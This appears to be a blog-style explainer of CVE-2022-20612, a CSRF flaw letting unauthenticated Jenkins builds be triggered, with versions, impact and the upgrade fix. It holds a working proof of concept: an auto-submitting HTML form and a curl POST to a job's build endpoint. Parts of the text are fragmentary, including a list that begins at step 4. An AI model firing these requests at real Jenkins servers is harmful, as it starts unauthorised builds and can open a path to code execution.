CVE-2022-20612 - Triggering Jenkins Builds Without Authentication – Deep Dive with Code & Exploit Details

Jenkins, the widely-used open-source automation server, helps developers build, test, and deploy software. However, sometimes vulnerabilities slip in that can jeopardize your projects. One such critical security issue is CVE-2022-20612, a Cross-Site Request Forgery (CSRF) flaw that impacts Jenkins versions 2.329 and earlier, and Long-Term Support (LTS) 2.319.1 and earlier.

This long read will help you understand this vulnerability in simple language, see how it can be exploited in the real world, and learn how to secure your Jenkins instance.

What Is CVE-2022-20612 All About?

Simply put, CVE-2022-20612 allows an unauthenticated attacker to trigger the build of a job in Jenkins *if* Jenkins is running without a security realm enabled (i.e., anyone can access the Jenkins web interface, and no login is required).

This happens because Jenkins didn’t enforce CSRF protection correctly for building jobs without parameters, making it possible for a malicious site to trick an admin into building a job without their consent.

References

- Jenkins Security Advisory 2022-01-12
- NIST NVD – CVE-2022-20612

A logged-in user (or, more accurately, anyone who can access Jenkins) visits the attacker’s site.

4. The malicious site sends a POST request in the background to Jenkins, triggering a job build (no user interaction needed).

No CSRF token is needed, and no credentials are required since the Jenkins server is open!

Step-by-Step CSRF Exploit Example

Suppose the Jenkins server is at http://jenkins.example.com/ and you want to trigger a build for the job named Test-Job, which accepts no parameters. Here’s a simple HTML exploit:

<!-- malicious.html -->
<html>
  <body>
    <h1>If you see this, a Jenkins job is about to be triggered!</h1>
    <form action="http://jenkins.example.com/job/Test-Job/build" method="POST" id="attackForm">
      <!-- No parameters needed -->
    </form>
    <script>
      document.getElementById("attackForm").submit();
    </script>
  </body>
</html>

How it works:
A victim (such as a Jenkins admin or any user) visits malicious.html. The JavaScript automatically submits the form, sending a POST request to Jenkins, which triggers the Test-Job build. There’s no authentication, no CSRF token check, and the build is started.

You can do the same without a browser using curl

curl -X POST http://jenkins.example.com/job/Test-Job/build

If Jenkins is unauthenticated and the job doesn’t require any parameters, this will start the job instantly.

Unintended Builds: Attackers can start builds as often as they like.

- Resource Abuse: Builds might kick off heavy jobs, consuming server/cloud resources.
- Payload Opportunity: If jobs contain scripts or steps under the attacker’s control, this could lead to code execution.

Mitigation & Fix

Update Jenkins!  
This problem is fixed in Jenkins 2.330 and LTS 2.319.2.

- Download latest Jenkins

CVE-2022-20612 is a CSRF bug in Jenkins, exploitable when no authentication is set up.

- Attackers can trigger build jobs using a simple POST request, no auth/CSRF required.

Timeline

Published on: 01/12/2022 20:15:00 UTC
Last modified on: 07/29/2022 16:20:00 UTC